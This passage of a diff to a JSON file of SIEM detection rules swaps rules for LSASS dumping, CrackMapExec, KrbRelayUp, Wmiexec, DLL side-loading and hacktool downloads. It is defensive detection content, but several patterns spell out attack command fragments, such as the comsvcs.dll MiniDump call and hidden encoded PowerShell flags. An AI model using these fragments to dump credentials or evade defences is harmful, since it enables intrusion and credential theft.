'\\')))" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\iviewers.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Windows Kits\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\Windows Kits\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_iis_susp_module_registration.yml" + "filename": "image_load_side_load_iviewers.yml" }, { - "title": "HackTool - CrackMapExec Process Patterns", - "id": "f26307d8-14cd-47e3-a26b-4b4769f24af6", + "title": "Microsoft Defender Loading DLL from Nondefault Path", + "id": "418dc89a-9808-4b87-b1d7-e5ae0cb6effc", "status": "experimental", - "description": "Detects suspicious process patterns found in logs when CrackMapExec is used", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects loading of Microsoft Defender's DLLs by its processes (MpCmdRun and NisSrv) from the non-default directory which may be an attempt to sideload arbitrary DLL", + "author": "Bhabesh Raj", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ - "Unknown" + "Very unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%tasklist /fi %' ESCAPE '\\' AND CommandLine LIKE '%Imagename eq lsass.exe%' ESCAPE '\\' AND (CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) OR (CommandLine LIKE '%do rundll32.exe C:\\\\windows\\\\System32\\\\comsvcs.dll, MiniDump%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '% full%' ESCAPE '\\' AND CommandLine LIKE '%\\%\\%B%' ESCAPE '\\') OR (CommandLine LIKE '%tasklist /v /fo csv%' ESCAPE '\\' AND CommandLine LIKE '%findstr /i \"lsass\"%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\NisSrv.exe' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\mpclient.dll' ESCAPE '\\') AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Windows Defender\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_crackmapexec_patterns.yml" + "filename": "image_load_side_load_windows_defender.yml" }, { - "title": "Suspicious GUP Usage", - "id": "0a4f6091-223b-41f6-8743-f322ec84930b", - "status": "test", - "description": "Detects execution of the Notepad++ updater in a suspicious directory, which is often used in DLL side-loading attacks", + "title": "Hacktool Download", + "id": "19b041f6-e583-40dc-b842-d6fa8011493f", + "status": "experimental", + "description": "Detects the creation of a file on disk that has an imphash of a well-known hack tool", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1574.002" + "attack.s0139", + "attack.t1564.004" ], "falsepositives": [ - "Execution of tools named GUP.exe and located in folders different than Notepad++\\updater" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\GUP.exe' ESCAPE '\\' AND NOT (((NewProcessName LIKE '%\\\\Program Files\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Program Files (x86)\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\Users\\\\%' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Roaming\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Imphash IN ('bcca3c247b619dcd13c8cdff5f123932', '3a19059bd7688cb88e70005f18efc439', 'bf6223a49e45d99094406777eb6004ba', '0c106686a31bfe2ba931ae1cf6e9dbc6', '0d1447d4b3259b3c2a1d4cfb7ece13c3', '1b0369a1e06271833f78ffa70ffb4eaf', '4c1b52a19748428e51b14c278d0f58e3', '4d927a711f77d62cebd4f322cb57ec6f', '66ee036df5fc1004d9ed5e9a94a1086a', '672b13f4a0b6f27d29065123fe882dfc', '6bbd59cea665c4afcc2814c1327ec91f', '725bb81dc24214f6ecacc0cfb36ad30d', '9528a0e91e28fbb88ad433feabca2456', '9da6d5d77be11712527dcab86df449a3', 'a6e01bc1ab89f8d91d9eab72032aae88', 'b24c5eddaea4fe50c6a96a2a133521e4', 'd21bbc50dcc169d7b4d0f01962793154', 'fcc251cceae90d22c392215cc9a2d5d6', '23867a89c2b8fc733be6cf5ef902f2d1', 'a37ff327f8d48e8a4d2f757e1b6e70bc', 'f9a28c458284584a93b14216308d31bd', '6118619783fc175bc7ebecff0769b46e', '959a83047e80ab68b368fdb3f4c6e4ea', '563233bfa169acc7892451f71ad5850a', '87575cb7a0e0700eb37f2e3668671a08', '13f08707f759af6003837a150a371ba1', '1781f06048a7e58b323f0b9259be798b', '233f85f2d4bc9d6521a6caae11a1e7f5', '24af2584cbf4d60bbe5c6d1b31b3be6d', '632969ddf6dbf4e0f53424b75e4b91f2', '713c29b396b907ed71a72482759ed757', '749a7bb1f0b4c4455949c0b2bf7f9e9f', '8628b2608957a6b0c6330ac3de28ce2e', '8b114550386e31895dfab371e741123d', '94cb940a1a6b65bed4d5a8f849ce9793', '9d68781980370e00e0bd939ee5e6c141', 'b18a1401ff8f444056d29450fbc0a6ce', 'cb567f9498452721d77a451374955f5f', '730073214094cd328547bf1f72289752', '17b461a082950fc6332228572138b80c', 'dc25ee78e2ef4d36faa0badf1e7461c9', '819b19d53ca6736448f9325a85736792', '829da329ce140d873b4a8bde2cbfaa7e', 'c547f2e66061a8dffb6f5a3ff63c0a74', '0588081ab0e63ba785938467e1b10cca', '0d9ec08bac6c07d9987dfd0f1506587c', 'bc129092b71c89b4d4c8cdf8ea590b29', '4da924cf622d039d58bce71cdf05d242', 'e7a3a5c377e2d29324093377d7db1c66', '9a9dbec5c62f0380b4fa5fd31deffedf', 'af8a3976ad71e5d5fdfb67ddb8dadfce', '0c477898bbf137bbd6f2a54e3b805ff4', '0ca9f02b537bcea20d4ea5eb1a9fe338', '3ab3655e5a14d4eefc547f4781bf7f9e', 'e6f9d5152da699934b30daab206471f6', '3ad59991ccf1d67339b319b15a41b35d', 'ffdd59e0318b85a3e480874d9796d872', '0cf479628d7cc1ea25ec7998a92f5051', '07a2d4dcbd6cb2c6a45e6b101f0b6d51', 'd6d0f80386e1380d05cb78e871bc72b1', '38d9e015591bbfd4929e0d0f47fa0055', '0e2216679ca6e1094d63322e3412d650', 'ada161bf41b8e5e9132858cb54cab5fb', '2a1bc4913cd5ecb0434df07cb675b798', '11083e75553baae21dc89ce8f9a195e4', 'a23d29c9e566f2fa8ffbb79267f5df80', '4a07f944a83e8a7c2525efa35dd30e2f', '767637c23bb42cd5d7397cf58b0be688', '14c4e4c72ba075e9069ee67f39188ad8', '3c782813d4afce07bbfc5a9772acdbdc', '7d010c6bb6a3726f327f7e239166d127', '89159ba4dd04e4ce5559f132a9964eb3', '6f33f4a5fc42b8cec7314947bd13f30f', '5834ed4291bdeb928270428ebbaf7604', '5a8a8a43f25485e7ee1b201edcbc7a38', 'dc7d30b90b2d8abf664fbed2b1b59894', '41923ea1f824fe63ea5beb84db7a3e74', '3de09703c8e79ed2ca3f01074719906b', 'a53a02b997935fd8eedcb5f7abab9b9f', 'e96a73c7bf33a464c510ede582318bf2', '32089b8851bbf8bc2d014e9f37288c83', '09D278F9DE118EF09163C6140255C690', '03866661686829d806989e2fc5a72606', 'e57401fbdadcd4571ff385ab82bd5d6d', '84B763C45C0E4A3E7CA5548C710DB4EE', '19584675d94829987952432e018d5056', '330768a4f172e10acb6287b87289d83b', '885c99ccfbe77d1cbfcb9c4e7c1a3313', '22a22bc9e4e0d2f189f1ea01748816ac', '7fa30e6bb7e8e8a69155636e50bf1b28') OR (Hash LIKE '%IMPHASH=BCCA3C247B619DCD13C8CDFF5F123932%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3A19059BD7688CB88E70005F18EFC439%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=bf6223a49e45d99094406777eb6004ba%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0C106686A31BFE2BA931AE1CF6E9DBC6%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0D1447D4B3259B3C2A1D4CFB7ECE13C3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=1B0369A1E06271833F78FFA70FFB4EAF%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4C1B52A19748428E51B14C278D0F58E3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4D927A711F77D62CEBD4F322CB57EC6F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=66EE036DF5FC1004D9ED5E9A94A1086A%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=672B13F4A0B6F27D29065123FE882DFC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=6BBD59CEA665C4AFCC2814C1327EC91F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=725BB81DC24214F6ECACC0CFB36AD30D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9528A0E91E28FBB88AD433FEABCA2456%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9DA6D5D77BE11712527DCAB86DF449A3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A6E01BC1AB89F8D91D9EAB72032AAE88%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=B24C5EDDAEA4FE50C6A96A2A133521E4%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=D21BBC50DCC169D7B4D0F01962793154%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=FCC251CCEAE90D22C392215CC9A2D5D6%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=23867A89C2B8FC733BE6CF5EF902F2D1%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A37FF327F8D48E8A4D2F757E1B6E70BC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=F9A28C458284584A93B14216308D31BD%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=6118619783FC175BC7EBECFF0769B46E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=959A83047E80AB68B368FDB3F4C6E4EA%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=563233BFA169ACC7892451F71AD5850A%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=87575CB7A0E0700EB37F2E3668671A08%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=13F08707F759AF6003837A150A371BA1%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=1781F06048A7E58B323F0B9259BE798B%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=233F85F2D4BC9D6521A6CAAE11A1E7F5%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=24AF2584CBF4D60BBE5C6D1B31B3BE6D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=632969DDF6DBF4E0F53424B75E4B91F2%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=713C29B396B907ED71A72482759ED757%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=749A7BB1F0B4C4455949C0B2BF7F9E9F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=8628B2608957A6B0C6330AC3DE28CE2E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=8B114550386E31895DFAB371E741123D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=94CB940A1A6B65BED4D5A8F849CE9793%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9D68781980370E00E0BD939EE5E6C141%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=B18A1401FF8F444056D29450FBC0A6CE%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=CB567F9498452721D77A451374955F5F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=730073214094CD328547BF1F72289752%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=17B461A082950FC6332228572138B80C%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=DC25EE78E2EF4D36FAA0BADF1E7461C9%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=819B19D53CA6736448F9325A85736792%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=829DA329CE140D873B4A8BDE2CBFAA7E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=C547F2E66061A8DFFB6F5A3FF63C0A74%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0588081AB0E63BA785938467E1B10CCA%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0D9EC08BAC6C07D9987DFD0F1506587C%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=BC129092B71C89B4D4C8CDF8EA590B29%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4DA924CF622D039D58BCE71CDF05D242%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=E7A3A5C377E2D29324093377D7DB1C66%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9A9DBEC5C62F0380B4FA5FD31DEFFEDF%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=AF8A3976AD71E5D5FDFB67DDB8DADFCE%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0C477898BBF137BBD6F2A54E3B805FF4%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0CA9F02B537BCEA20D4EA5EB1A9FE338%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3AB3655E5A14D4EEFC547F4781BF7F9E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=E6F9D5152DA699934B30DAAB206471F6%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3AD59991CCF1D67339B319B15A41B35D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=FFDD59E0318B85A3E480874D9796D872%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0CF479628D7CC1EA25EC7998A92F5051%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=07A2D4DCBD6CB2C6A45E6B101F0B6D51%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=D6D0F80386E1380D05CB78E871BC72B1%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=38D9E015591BBFD4929E0D0F47FA0055%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0E2216679CA6E1094D63322E3412D650%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=ADA161BF41B8E5E9132858CB54CAB5FB%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=2A1BC4913CD5ECB0434DF07CB675B798%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=11083E75553BAAE21DC89CE8F9A195E4%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A23D29C9E566F2FA8FFBB79267F5DF80%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4A07F944A83E8A7C2525EFA35DD30E2F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=767637C23BB42CD5D7397CF58B0BE688%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=14C4E4C72BA075E9069EE67F39188AD8%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=7D010C6BB6A3726F327F7E239166D127%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=89159BA4DD04E4CE5559F132A9964EB3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=5834ED4291BDEB928270428EBBAF7604%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3DE09703C8E79ED2CA3F01074719906B%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A53A02B997935FD8EEDCB5F7ABAB9B9F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=E96A73C7BF33A464C510EDE582318BF2%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=32089B8851BBF8BC2D014E9F37288C83%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=09D278F9DE118EF09163C6140255C690%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=03866661686829d806989e2fc5a72606%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=e57401fbdadcd4571ff385ab82bd5d6d%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=84B763C45C0E4A3E7CA5548C710DB4EE%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=19584675D94829987952432E018D5056%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=330768A4F172E10ACB6287B87289D83B%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=885C99CCFBE77D1CBFCB9C4E7C1A3313%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=22A22BC9E4E0D2F189F1EA01748816AC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=7FA30E6BB7E8E8A69155636E50BF1B28%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_gup_suspicious_execution.yml" + "filename": "create_stream_hash_hacktool_download.yml" }, { - "title": "VolumeShadowCopy Symlink Creation Via Mklink", - "id": "40b19fa6-d835-400c-b301-41f3a2baacaf", - "status": "stable", - "description": "Shadow Copies storage symbolic link creation using operating systems utilities", - "author": "Teymur Kheirkhabarov, oscd.community", + "title": "Potential Suspicious Winget Package Installation", + "id": "a3f5c081-e75b-43a0-9f5b-51f26fe5dba2", + "status": "experimental", + "description": "Detects potential suspicious winget package installation from a suspicious source.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.002", - "attack.t1003.003" + "attack.defense_evasion", + "attack.persistence" ], "falsepositives": [ - "Legitimate administrator working with shadow copies, access for backup purposes" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%mklink%' ESCAPE '\\' AND CommandLine LIKE '%HarddiskVolumeShadowCopy%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Contents LIKE '[ZoneTransfer] ZoneId=3%' ESCAPE '\\' AND (Contents LIKE '%://1%' ESCAPE '\\' OR Contents LIKE '%://2%' ESCAPE '\\' OR Contents LIKE '%://3%' ESCAPE '\\' OR Contents LIKE '%://4%' ESCAPE '\\' OR Contents LIKE '%://5%' ESCAPE '\\' OR Contents LIKE '%://6%' ESCAPE '\\' OR Contents LIKE '%://7%' ESCAPE '\\' OR Contents LIKE '%://8%' ESCAPE '\\' OR Contents LIKE '%://9%' ESCAPE '\\') AND TargetFilename LIKE '%:Zone.Identifier' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\WinGet\\\\%' ESCAPE '\\')" ], - "filename": "proc_creation_win_cmd_mklink_shadow_copies_access_symlink.yml" + "filename": "create_stream_hash_winget_susp_package_source.yml" }, { - "title": "HackTool - KrbRelayUp Execution", - "id": "12827a56-61a4-476a-a9cb-f3068f191073", + "title": "Suspicious File Download From File Sharing Websites", + "id": "52182dfb-afb7-41db-b4bc-5336cb29b464", "status": "experimental", - "description": "Detects KrbRelayUp used to perform a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced", + "description": "Detects the download of suspicious file type from a well-known file and paste sharing domain", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1558.003", - "attack.lateral_movement", - "attack.t1550.003" + "attack.defense_evasion", + "attack.s0139", + "attack.t1564.004" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\KrbRelayUp.exe' ESCAPE '\\' OR OriginalFileName = 'KrbRelayUp.exe') OR (CommandLine LIKE '% relay %' ESCAPE '\\' AND CommandLine LIKE '% -Domain %' ESCAPE '\\' AND CommandLine LIKE '% -ComputerName %' ESCAPE '\\') OR (CommandLine LIKE '% krbscm %' ESCAPE '\\' AND CommandLine LIKE '% -sc %' ESCAPE '\\') OR (CommandLine LIKE '% spawn %' ESCAPE '\\' AND CommandLine LIKE '% -d %' ESCAPE '\\' AND CommandLine LIKE '% -cn %' ESCAPE '\\' AND CommandLine LIKE '% -cp %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((Contents LIKE '%https://transfer.sh/%' ESCAPE '\\' OR Contents LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR Contents LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR Contents LIKE '%pastebin.com%' ESCAPE '\\' OR Contents LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR Contents LIKE '%mediafire.com%' ESCAPE '\\' OR Contents LIKE '%mega.nz%' ESCAPE '\\' OR Contents LIKE '%ddns.net%' ESCAPE '\\' OR Contents LIKE '%.paste.ee%' ESCAPE '\\' OR Contents LIKE '%.hastebin.com%' ESCAPE '\\' OR Contents LIKE '%.ghostbin.co/%' ESCAPE '\\' OR Contents LIKE '%ufile.io%' ESCAPE '\\' OR Contents LIKE '%storage.googleapis.com%' ESCAPE '\\' OR Contents LIKE '%anonfiles.com%' ESCAPE '\\' OR Contents LIKE '%send.exploit.in%' ESCAPE '\\' OR Contents LIKE '%privatlab.net%' ESCAPE '\\' OR Contents LIKE '%privatlab.com%' ESCAPE '\\' OR Contents LIKE '%sendspace.com%' ESCAPE '\\' OR Contents LIKE '%pastetext.net%' ESCAPE '\\' OR Contents LIKE '%pastebin.pl%' ESCAPE '\\' OR Contents LIKE '%paste.ee%' ESCAPE '\\') AND (TargetFilename LIKE '%.exe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbs:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.dll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.one:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.hta:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.lnk:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.xll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.cpl:Zone%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_krbrelayup.yml" + "filename": "create_stream_hash_file_sharing_domains_download_susp_extension.yml" }, { - "title": "Trickbot Malware Reconnaissance Activity", - "id": "410ad193-a728-4107-bc79-4419789fcbf8", + "title": "Exports Registry Key To an Alternate Data Stream", + "id": "0d7a9363-af70-4e7b-a3b7-1a176b7fbe84", "status": "test", - "description": "Detects potential reconnaissance activity used by Trickbot malware. Trickbot enumerates domain/network topology and executes certain commands automatically every few minutes.", - "author": "David Burkett, Florian Roth", + "description": "Exports the target Registry key and hides it in the specified alternate data stream.", + "author": "Oddvar Moe, Sander Wiebing, oscd.community", "tags": [ - "attack.discovery", - "attack.t1482" + "attack.defense_evasion", + "attack.t1564.004" ], "falsepositives": [ - "Rare System Admin Activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\nltest.exe' ESCAPE '\\' AND CommandLine LIKE '%/domain\\_trusts /all\\_trusts%' ESCAPE '\\')" + "SELECT * FROM logs WHERE NewProcessName LIKE '%\\\\regedit.exe' ESCAPE '\\'" ], - "filename": "proc_creation_win_malware_trickbot_recon_activity.yml" + "filename": "create_stream_hash_regedit_export_to_ads.yml" }, { - "title": "Suspicious LOLBIN AccCheckConsole", - "id": "0f6da907-5854-4be6-859a-e9958747b0aa", - "status": "test", - "description": "Detects suspicious LOLBIN AccCheckConsole execution with parameters as used to load an arbitrary DLL", - "author": "Florian Roth (Nextron Systems)", + "title": "Unusual File Download from Direct IP Address", + "id": "025bd229-fd1f-4fdb-97ab-20006e1a5368", + "status": "experimental", + "description": "Detects the download of suspicious file type from URLs with IP", + "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ - "attack.execution" + "attack.defense_evasion", + "attack.t1564.004" ], "falsepositives": [ - "Legitimate use of the UI Accessibility Checker" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\AccCheckConsole.exe' ESCAPE '\\' OR OriginalFileName = 'AccCheckConsole.exe') AND (CommandLine LIKE '% -window %' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Contents REGEXP 'http[s]?://[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}' AND (TargetFilename LIKE '%.ps1:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.bat:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.exe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbs:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.dll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.one:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.cmd:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.hta:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.xll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.lnk:Zone%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_susp_acccheckconsole.yml" + "filename": "create_stream_hash_susp_ip_domains.yml" }, { - "title": "HackTool - Wmiexec Default Powershell Command", - "id": "022eaba8-f0bf-4dd9-9217-4604b0bb3bb0", + "title": "HandleKatz Duplicating LSASS Handle", + "id": "b1bd3a59-c1fd-4860-9f40-4dd161a7d1f5", "status": "experimental", - "description": "Detects the execution of PowerShell with a specific flag sequence that is used by the Wmiexec script", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects HandleKatz opening LSASS to duplicate its handle to later dump the memory without opening any new handles", + "author": "Bhabesh Raj (rule), @thefLinkk", "tags": [ + "attack.execution", + "attack.t1106", "attack.defense_evasion", - "attack.lateral_movement" + "attack.t1003.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%-NoP -NoL -sta -NonI -W Hidden -Exec Bypass -Enc%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND GrantedAccess = '0x1440' AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll+%' ESCAPE '\\' AND CallTrace LIKE '%|UNKNOWN(%' ESCAPE '\\' AND CallTrace LIKE '%)' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_wmiexec_default_powershell.yml" + "filename": "proc_access_win_handlekatz_lsass_access.yml" }, { - "title": "Suspicious PowerShell Parent Process", - "id": "754ed792-634f-40ae-b3bc-e0448d33f695", - "status": "test", - "description": "Detects a suspicious or uncommon parent processes of PowerShell", - "author": "Teymur Kheirkhabarov, Harish Segar", + "title": "Direct Syscall of NtOpenProcess", + "id": "3f3f3506-1895-401b-9cc3-e86b16e630d0", + "status": "experimental", + "description": "Detects the usage of the direct syscall of NtOpenProcess which might be done from a CobaltStrike BOF.", + "author": "Christian Burkard (Nextron Systems), Tim Shelton", "tags": [ "attack.execution", - "attack.t1059.001" + "attack.t1106" ], "falsepositives": [ - "Other scripts" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%tomcat%' ESCAPE '\\' OR (ParentProcessName LIKE '%\\\\amigo.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\browser.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\chrome.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\firefox.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\jbosssvc.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\microsoftedge.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\microsoftedgecp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MicrosoftEdgeSH.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR 